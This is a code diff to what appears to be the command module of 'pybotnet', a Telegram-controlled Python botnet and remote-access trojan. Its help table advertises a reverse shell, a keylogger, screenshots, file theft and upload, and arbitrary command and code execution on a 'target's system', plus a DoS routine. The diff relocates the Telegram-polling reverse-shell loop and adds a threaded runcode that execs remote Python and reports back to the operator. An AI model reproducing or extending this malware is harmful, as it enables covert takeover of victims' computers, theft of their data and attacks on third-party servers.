@@ -29,23 +29,23 @@ scripts_name = {
 
     "help":             "`help`: send this message",
 
-    "do_sleep":         "`do_sleep <scconds> <message>`: print message and sleep",
+    "do_sleep":         "`do_sleep <scconds> <message>`: prints a message and sleeps",
 
-    "get_info":         "`get_info`: get target info",
+    "get_info":         "`get_info`: gets target info",
 
-    "reverse_shell":    "`<system MAC_ADDRES> reverse_shell`: start reverse shell on target system",
+    "reverse_shell":    "`<system MAC_ADDRES> reverse_shell`: starts reverse shell on target's system",
 
-    "export_file":      "`export_file <download link>`: target donwload this file and save to script path",
+    "export_file":      "`export_file <download link>`: File will be exported on the target's system",
 
-    "import_file":      "`import_file <file route>`: get a file from target system",
+    "import_file":      "`import_file <file route>`: download's a file from target's system",
 
-    "screenshot":       "`screenshot`: Takes a screenshot, return the download link",
+    "screenshot":       "`screenshot`: Take's a screenshot and return's the download link",
 
-    "info":             "`info`: run `get_info` command!",
+    "info":             "`info`: runs `get_info` command!",
 
-    "cmd":              "`cmd <command>`: run command in target terminal",
+    "cmd":              "`cmd <command>`: runs commands in target's terminal",
 
-    "/start":           "`/start`: run `help` command!",
+    "/start":           "`/start`: runs `help` command!",
 
     "keylogger":        "`keylogger start/stop`: Starts keylogger. use keylogger stop to stop keylogger",
 
@@ -59,65 +59,6 @@ scripts_name = {
     "runcode":          "`runcode <code>` Will run given python code. This function cant return values.",
 }
 
-
-def split_command(command: str) -> list:
-    '''split string by space'''
-    return command.split('\n') if '\n' in command else command.split(' ')
-
-
-def get_command_name(command: str) -> str:
-    '''get first arg'''
-    return split_command(command)[0]
-
-
-def is_command(command) -> bool:
-    command_name = get_command_name(command)
-    if command_name in scripts_name:
-        return True
-    return False
-
-
-def reverse_shell(ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id, logger):
-    ''' start reverse shell on target system and send response in telegram bot '''
-
-    def send_message(text: str):
-        util.send_message_by_third_party_proxy(
-            text, TELEGRAM_TOKEN=TELEGRAM_TOKEN,
-            ADMIN_CHAT_ID=ADMIN_CHAT_ID, logger=logger)
-
-    logger.info("start reverse shell")
-    repeat = 0
-    time_out = 500
-
-    while True:
-        if repeat > time_out:
-            break
-
-        pwd = f"{os.getcwd()}=>"
-
-        message_one = util.get_last_admin_command_by_third_party_proxy(
-            ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id, logger)
-
-        if not message_one:
-            if repeat == 0:
-                send_message(pwd)
-            sleep(2)
-            repeat += 1
-            continue
-        else:
-            if message_one == "exit":
-                out_put = "reverse shell exit."
-                send_message(out_put)
-                break
-            else:
-                out_put = execute_cmd(
-                    message_one, ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger)
-            send_message(out_put)
-            repeat = 0
-    logger.info("reverse shell exit.")
-    return "reverse shell exit."
-
-
 def execute_scripts(command: str, pybotnet_up_time: int, ADMIN_CHAT_ID: str,
                     TELEGRAM_TOKEN: str, previous_update_id: List[int], logger):
     command_name = get_command_name(command)
@@ -179,7 +120,7 @@ def execute_scripts(command: str, pybotnet_up_time: int, ADMIN_CHAT_ID: str,
                 return dos(logger, command)
 
             elif command_name == "runcode":
-                return runcode(logger, command)
+                return runcode(ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id,logger, command)
         logger.error('execute_scripts invalid command; Wrong format')
         return f"execute_scripts invalid command; Wrong format \n\n scripts name:\n {','.join(scripts_name)}"
 
@@ -187,6 +128,64 @@ def execute_scripts(command: str, pybotnet_up_time: int, ADMIN_CHAT_ID: str,
         return f'execute_scripts error: {error}'
 
 
+def split_command(command: str) -> list:
+    '''split string by space'''
+    return command.split('\n') if '\n' in command else command.split(' ')
+
+
+def get_command_name(command: str) -> str:
+    '''get first arg'''
+    return split_command(command)[0]
+
+
+def is_command(command) -> bool:
+    command_name = get_command_name(command)
+    if command_name in scripts_name:
+        return True
+    return False
+
+
+def reverse_shell(ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id, logger):
+    ''' start reverse shell on target system and send response in telegram bot '''
+
+    def send_message(text: str):
+        util.send_message_by_third_party_proxy(
+            text, TELEGRAM_TOKEN=TELEGRAM_TOKEN,
+            ADMIN_CHAT_ID=ADMIN_CHAT_ID, logger=logger)
+
+    logger.info("start reverse shell")
+    repeat = 0
+    time_out = 500
+
+    while True:
+        if repeat > time_out:
+            break
+
+        pwd = f"{os.getcwd()}=>"
+
+        message_one = util.get_last_admin_command_by_third_party_proxy(
+            ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id, logger)
+
+        if not message_one:
+            if repeat == 0:
+                send_message(pwd)
+            sleep(2)
+            repeat += 1
+            continue
+        else:
+            if message_one == "exit":
+                out_put = "reverse shell exit."
+                send_message(out_put)
+                break
+            else:
+                out_put = execute_cmd(
+                    message_one, ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger)
+            send_message(out_put)
+            repeat = 0
+    logger.info("reverse shell exit.")
+    return "reverse shell exit."
+
+
 def execute_do_sleep(command, logger):
     command = split_command(command)
     try:
@@ -320,7 +319,7 @@ def cmd(command, ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger, withThread):
 
 def execute_cmd(command: str, ADMIN_CHAT_ID: str, TELEGRAM_TOKEN: str, logger, withThread=False) -> str:
     # Removed Is Shell
-    # For what is for reverse shell
+    #With Thread is for reverse Shell only
     try:
         command = split_command(command)
         if command[0] == 'cmd':
@@ -606,16 +605,26 @@ def dos(logger, command):
                 logger.error("Something Failed. Maybe The Servers Are Down !")
                 return "Something Failed. Maybe The Servers Are Down !"
 
-
-def runcode(logger, command):
+def exec_runner(ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id,logger,command):
+    def send_message(text: str):
+        util.send_message_by_third_party_proxy(
+            text, TELEGRAM_TOKEN=TELEGRAM_TOKEN,
+            ADMIN_CHAT_ID=ADMIN_CHAT_ID, logger=logger)
     code = ' '.join(split_command(command)[1:])
     logger.info(f"Trying to run {code}")
     try:
+        sleep(5) # So that the runcode message deliver first.
         exec(command)
-        return "ِDone"
+        send_message("Executed Successfully")
     except Exception as error:
         logger.error(f"Something failed while trying to run code. {error}")
-        return f"Something failed while trying to run code. {error}"
+        send_message(f"Something failed while trying to run code. {error}")
+
+def runcode(ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id,logger, command):
+    logger.info(f"Trying to run {command}")
+    t1 = threading.Thread(target=exec_runner,args=(ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id,logger,command))
+    t1.start()
+    return "Running The given code , the results will not be returned but you will get a message informing you that the code has finished."
 
 
 def command_help(logger):
@@ -624,11 +633,10 @@ def command_help(logger):
         for _, value in scripts_name.items():
             commands += '\n\n|' + value
         logger.info(f'scripts.command_help: return command lists')
-        return f'''command list:
-{commands}
-
+        return f'''
 Version: {settings.pybotnet_version}
-more help: {settings.pybotnet_github_link}'''
+more help: {settings.pybotnet_github_link}
+command list:{commands}'''
 
     except Exception as error:
         logger(f'scripts.command_help: error {error}')
@@ -639,3 +647,5 @@ _____________
 
 Pybotnet Version:{settings.pybotnet_version}
 for more help, see: {settings.pybotnet_github_link}'''
+
+
